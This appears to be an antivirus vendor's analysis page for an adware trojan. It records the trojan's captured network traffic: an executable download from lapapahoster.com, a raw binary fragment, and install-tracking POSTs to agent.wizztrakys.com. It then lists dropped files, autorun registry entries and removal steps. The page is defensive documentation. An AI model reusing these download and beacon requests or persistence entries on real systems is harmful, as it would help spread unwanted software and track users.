<<< skipped >>>

GET /download/3/wizzcaster_uninstaller_v2.exe HTTP/1.1


Host: lapapahoster.com


HTTP/1.1 200 OK
Date: Fri, 30 Jun 2017 10:08:51 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_uninstaller_v2.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
4dc00..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
.....VY.........."...0.................. ........@.. .................
......@............@.....................................O.......p....
................ ......L..............................................
.. ............... ..H............text........ ...................... 
..`.rsrc...p...........................@..@.reloc....... .............
.........@..B........................H........#...............4..`....
........................................0..Y........r...p(......~....o
............o......r[..po.......$....o......rk..po..... .....$....o...
...r...po.......%....o......r...po.......&....o......r...po.....(.....
(....o......)...%..,.o......(.....o......r...po.....(.....(....o......
)...%..,.o......(.....o......r...p~....o.............o....t.......o...
...o ...(!.....(............io"...o...... ...*....0..)........(......s
#.....o$.....o%.....o&...... ..*....0...........('.....r...po(.... ..*
".()....*^..}.....(*......(.....*.0..n.........(......)...%.._.o......
..... ....(....(......( .....o,...r...po......o-...t.............%...o
....&.........*..........fg.......0.. .........,..{....... ....,...{..
..o........(/....*...s0...}......(1.....r...po2....*&..(.....*&.()....
.*....0..9........~.........,".r...p.....(3...o4...s5...........~.....
 ..*....0...........~..... ..*".......*.0...........~..... ..*".(6....
*Vs....(7...t.........*..BSJB............v2.0.50727......l.......#
<<< skipped >>>


POST /wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....




api_key=fa02609b-2368-11e6-922f-0cc47a47968c

HTTP/1.1 200 OK


Date: Fri, 30 Jun 2017 10:08:50 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=kjq0mjfh0hbmqd81se32s4h3m5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}....


POST /wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok HTTP/1.1


Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue


HTTP/1.1 100 Continue
....




api_key=fa02609b-2368-11e6-922f-0cc47a47968c

HTTP/1.1 200 OK


Date: Fri, 30 Jun 2017 10:08:50 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=gg03udqv5c7e14b7laf4snoir1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}..

The Trojan connects to the servers at the folowing location(s):

UGRWL2XSH.exe_1636_rwx_0024C000_00004000:

%6sl^?
%1sl^

UGRWL2XSH.exe_1636_rwx_002D0000_0000F000:

.UolP


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:3604
    AfficheOne.exe:2272
    Era5Le.exe:4064
    Like.exe:2172

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\10LV1RKEX2\Like.exe.config (1 bytes)
    C:\config.conf (62 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\10LV1RKEX2\AfficheOne.exe (196 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\10LV1RKEX2\Era5Le.exe.config (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\10LV1RKEX2\AfficheOne.exe.config (1 bytes)
    %Program Files%\UGRWL2XSHI\cast.config (37 bytes)
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (868 bytes)
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (868 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\k4n1pqkyz3z\i3dhyoluabb.exe.config (1 bytes)
    %Program Files%\UGRWL2XSHI\uninstaller.exe.config (1 bytes)
    %Program Files%\UGRWL2XSHI\UGRWL2XSH.exe.config (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (852 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "kxmpfu4ih3u" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\k4n1pqkyz3z\i3dhyoluabb.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "OMEWPRODUCT_3TCY2" = "C:\%original file name%.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "9MB0X2MTSJK0LGC" = "%Program Files%\UGRWL2XSHI\UGRWL2XSH.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now